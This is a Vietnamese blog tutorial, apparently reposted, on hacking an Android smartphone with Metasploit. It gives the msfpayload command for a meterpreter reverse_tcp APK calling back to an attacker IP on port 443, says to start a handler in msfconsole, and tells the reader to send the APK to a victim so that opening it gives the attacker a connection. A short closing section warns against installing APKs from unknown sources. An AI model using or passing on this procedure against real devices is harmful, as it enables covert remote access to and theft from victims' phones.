Home / Thủ Thuật / Hacking / Hacking Android smartphone sử dụng Metasploit

Hacking Android smartphone sử dụng Metasploit

Ngày nay, số lượng thiết bị mobile được sử dụng ngày một nhiều trong cuộc sống, kéo theo đó là mối hiểm họa bảo mật cũng tăng theo. Trong bài viết này, mình sẽ hướng dẫn các bạn cách hack android smartphone sử dụng metasploit.

Dưới đây là một vài thông tin cho bài hướng dẫn này:

Attacker IP address: 192.168.8.94

Attacker port to reveive connection: 443

Yêu cầu:
+ Metasploit Framework
+ Android smartphone (HTC One android 4.4 KitKat)

Các bước thực hiện:

1. Mở terminal và tạo một khai thác:

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

Như đã được diễn giải ở trên, attacker IP address là 192.168.8.94, bạn sẽ nhập lệnh như hình dưới đây:

Click image for larger version. </p>
<p>Name:	android_hack1.jpg <br />
Views:	31 <br />
Size:	17.6 KB <br />
ID:	872

2. Payload được sử dungj ở đây là reverse_tcp, nó cho phép kết nối từ victim trở lại máy của attacker. Bây giờ trên máy attacker, bạn cần sử dụng module handler. Nhập msfconsole trong terminal

Click image for larger version. </p>
<p>Name:	android_hack2.jpg <br />
Views:	31 <br />
Size:	49.4 KB <br />
ID:	873

3. Sau khi đã thiết lập xong, bạn cần nhập exploit

Click image for larger version. </p>
<p>Name:	android_hack3.jpg <br />
Views:	31 <br />
Size:	25.2 KB <br />
ID:	874

4. Bây giờ, bạn gửi file APK đã tạo được ở bước 1 và gửi cho nạn nhân. Khi nạn nhân click vào file APK bạn sẽ nhận được một kết nối từ victim

Click image for larger version. </p>
<p>Name:	android_hack4.jpg <br />
Views:	31 <br />
Size:	37.9 KB <br />
ID:	875Click image for larger version. </p>
<p>Name:	android_hack5.jpg <br />
Views:	31 <br />
Size:	33.4 KB <br />
ID:	876

Video:

Kết luận:

  1. Không được cài file APK từ một nguồn không rõ ràng
  2. Nếu bạn đã cài file APK từ một nguồn không rõ ràng, hãy chắc chắn rằng bạn có thể xem, đọc và kiểm tra mã nguồn. Hình dưới đây là mã nguồn của file APK độc hại trong hướng dẫn này.

 

Click image for larger version. </p>
<p>Name:	android_hack6.jpg <br />
Views:	30 <br />
Size:	32.6 KB <br />
ID:	877

 

Nguồn: hacking-tutorial

About dongpolicex2

Check Also

Copy video, ảnh từ iPhone iPad vào máy tính không cần iTunes

Có nhiều cách Copy video iPhone vào máy tính như: Đồng bộ video, ảnh từ …

Leave a Reply

Your email address will not be published. Required fields are marked *

0902 780 887